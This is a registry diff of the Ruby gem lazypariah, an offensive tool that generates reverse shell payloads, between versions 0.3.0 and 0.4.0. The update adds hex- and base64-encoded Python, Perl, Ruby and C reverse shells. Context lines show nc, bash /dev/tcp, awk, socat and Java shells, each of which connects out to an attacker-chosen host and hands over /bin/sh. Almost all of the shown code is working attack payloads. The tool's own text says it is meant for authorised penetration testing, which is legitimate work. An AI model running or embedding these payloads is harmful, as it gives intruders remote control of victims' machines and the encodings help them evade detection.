lazypariah 0.3.0 → 0.4.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/bin/lazypariah +45 -7
- metadata +2 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: a3aee611f4d7a3d19d4c7816eee540e7a2d0e04523e565719158e78fe365a026
|
|
4
|
+
data.tar.gz: 7f63871c91c193144da7182a32eabd9c401561deb8fbf1c6678ceb953a8d9a37
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: f049e7ff4764242aab6cee06bb8b9e314061d751241260e66045465e4dd38c926fe483886b7513c684d0ee9b26c8bb12d039f5f6ab8831b313856f7d431beb91
|
|
7
|
+
data.tar.gz: 48c488ee7a6776f336d7e806bcb914645ab04cc56cc0adda1c9aaeec70999b0f2b94ed30f7818c4e67d74bb5638b113889e3c938bd45d80c91932ddfb89a1a93
|
data/bin/lazypariah
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
#!/usr/bin/env ruby
|
|
2
2
|
#
|
|
3
3
|
# Title: LAZYPARIAH
|
|
4
|
-
# Version: 0.
|
|
4
|
+
# Version: 0.4.0
|
|
5
5
|
# Description:
|
|
6
6
|
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
|
7
7
|
# on the fly. It is intended to be used only in authorised circumstances by
|
|
@@ -29,7 +29,7 @@ require "stringio"
|
|
|
29
29
|
|
|
30
30
|
# Define constants.
|
|
31
31
|
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
|
32
|
-
PROGRAM_VERSION = "0.
|
|
32
|
+
PROGRAM_VERSION = "0.4.0".freeze()
|
|
33
33
|
EXECUTABLE_NAME = "lazypariah".freeze()
|
|
34
34
|
|
|
35
35
|
# Define payload list.
|
|
@@ -41,6 +41,9 @@ PAYLOAD_LIST = [
|
|
|
41
41
|
"python3_b64",
|
|
42
42
|
"python2_b64",
|
|
43
43
|
"python_b64",
|
|
44
|
+
"python3_hex",
|
|
45
|
+
"python2_hex",
|
|
46
|
+
"python_hex",
|
|
44
47
|
"nc",
|
|
45
48
|
"nc_pipe",
|
|
46
49
|
"php_fd_3",
|
|
@@ -57,9 +60,12 @@ PAYLOAD_LIST = [
|
|
|
57
60
|
"php_fd_6_tags",
|
|
58
61
|
"perl",
|
|
59
62
|
"perl_c",
|
|
63
|
+
"perl_b64",
|
|
64
|
+
"perl_hex",
|
|
60
65
|
"ruby",
|
|
61
66
|
"ruby_c",
|
|
62
67
|
"ruby_b64",
|
|
68
|
+
"ruby_hex",
|
|
63
69
|
"bash_tcp",
|
|
64
70
|
"awk",
|
|
65
71
|
"socat",
|
|
@@ -68,8 +74,10 @@ PAYLOAD_LIST = [
|
|
|
68
74
|
"java_class_gzip_b64",
|
|
69
75
|
"c_binary",
|
|
70
76
|
"c_binary_b64",
|
|
77
|
+
"c_binary_hex",
|
|
71
78
|
"c_binary_gzip",
|
|
72
|
-
"c_binary_gzip_b64"
|
|
79
|
+
"c_binary_gzip_b64",
|
|
80
|
+
"c_binary_gzip_hex"
|
|
73
81
|
].sort()
|
|
74
82
|
|
|
75
83
|
# Define function for displaying program information.
|
|
@@ -166,12 +174,21 @@ begin
|
|
|
166
174
|
when "python3_b64"
|
|
167
175
|
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
168
176
|
print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
|
|
177
|
+
when "python3_hex"
|
|
178
|
+
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
179
|
+
print_output("echo #{code} | xxd -p -r - | python3", url_encode=url_encode)
|
|
169
180
|
when "python2_b64"
|
|
170
181
|
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
171
182
|
print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
|
|
183
|
+
when "python2_hex"
|
|
184
|
+
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
185
|
+
print_output("echo #{code} | xxd -p -r - | python2", url_encode=url_encode)
|
|
172
186
|
when "python_b64"
|
|
173
187
|
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
|
174
188
|
print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
|
|
189
|
+
when "python_hex"
|
|
190
|
+
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
|
191
|
+
print_output("echo #{code} | xxd -p -r - | python", url_encode=url_encode)
|
|
175
192
|
when "nc"
|
|
176
193
|
print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
|
|
177
194
|
when "nc_pipe"
|
|
@@ -204,6 +221,12 @@ begin
|
|
|
204
221
|
print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
|
|
205
222
|
when "perl_c"
|
|
206
223
|
print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
|
|
224
|
+
when "perl_b64"
|
|
225
|
+
code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
|
|
226
|
+
print_output("echo #{code} | base64 -d | perl", url_encode=url_encode)
|
|
227
|
+
when "perl_hex"
|
|
228
|
+
code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
|
|
229
|
+
print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode)
|
|
207
230
|
when "ruby"
|
|
208
231
|
print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
|
|
209
232
|
when "ruby_c"
|
|
@@ -211,12 +234,15 @@ begin
|
|
|
211
234
|
when "ruby_b64"
|
|
212
235
|
code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
|
|
213
236
|
print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
|
|
237
|
+
when "ruby_hex"
|
|
238
|
+
code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
|
|
239
|
+
print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode)
|
|
214
240
|
when "bash_tcp"
|
|
215
241
|
print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
|
|
216
242
|
when "awk"
|
|
217
243
|
print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
|
|
218
244
|
when "socat"
|
|
219
|
-
print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
|
|
245
|
+
print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode)
|
|
220
246
|
when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
|
|
221
247
|
code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
|
|
222
248
|
|
|
@@ -246,7 +272,7 @@ begin
|
|
|
246
272
|
end
|
|
247
273
|
|
|
248
274
|
system("rm -r #{temp_dir}")
|
|
249
|
-
when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
|
|
275
|
+
when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64", "c_binary_hex", "c_binary_gzip_hex"
|
|
250
276
|
code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
|
|
251
277
|
|
|
252
278
|
temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
|
|
@@ -261,7 +287,10 @@ begin
|
|
|
261
287
|
print_output(binary_payload)
|
|
262
288
|
when "c_binary_b64"
|
|
263
289
|
binary_payload_b64 = Base64.strict_encode64(binary_payload)
|
|
264
|
-
print_output(binary_payload_b64)
|
|
290
|
+
print_output(binary_payload_b64, url_encode=url_encode)
|
|
291
|
+
when "c_binary_hex"
|
|
292
|
+
binary_payload_hex = binary_payload.unpack("H*")[0]
|
|
293
|
+
print_output(binary_payload_hex)
|
|
265
294
|
when "c_binary_gzip"
|
|
266
295
|
sio = StringIO.new()
|
|
267
296
|
sio.binmode()
|
|
@@ -269,7 +298,7 @@ begin
|
|
|
269
298
|
gz.write(binary_payload)
|
|
270
299
|
gz.close()
|
|
271
300
|
binary_payload_gzip = sio.string
|
|
272
|
-
print_output(binary_payload_gzip
|
|
301
|
+
print_output(binary_payload_gzip)
|
|
273
302
|
when "c_binary_gzip_b64"
|
|
274
303
|
sio = StringIO.new()
|
|
275
304
|
sio.binmode()
|
|
@@ -279,6 +308,15 @@ begin
|
|
|
279
308
|
binary_payload_gzip = sio.string
|
|
280
309
|
binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
|
|
281
310
|
print_output(binary_payload_gzip_b64, url_encode=url_encode)
|
|
311
|
+
when "c_binary_gzip_hex"
|
|
312
|
+
sio = StringIO.new()
|
|
313
|
+
sio.binmode()
|
|
314
|
+
gz = Zlib::GzipWriter.new(sio)
|
|
315
|
+
gz.write(binary_payload)
|
|
316
|
+
gz.close()
|
|
317
|
+
binary_payload_gzip = sio.string
|
|
318
|
+
binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
|
|
319
|
+
print_output(binary_payload_gzip_hex)
|
|
282
320
|
end
|
|
283
321
|
end
|
|
284
322
|
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: lazypariah
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.
|
|
4
|
+
version: 0.4.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Peter Funnell
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2020-11-
|
|
11
|
+
date: 2020-11-24 00:00:00.000000000 Z
|
|
12
12
|
dependencies: []
|
|
13
13
|
description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
|
|
14
14
|
on the fly. It is intended to be used only in authorised circumstances by qualified
|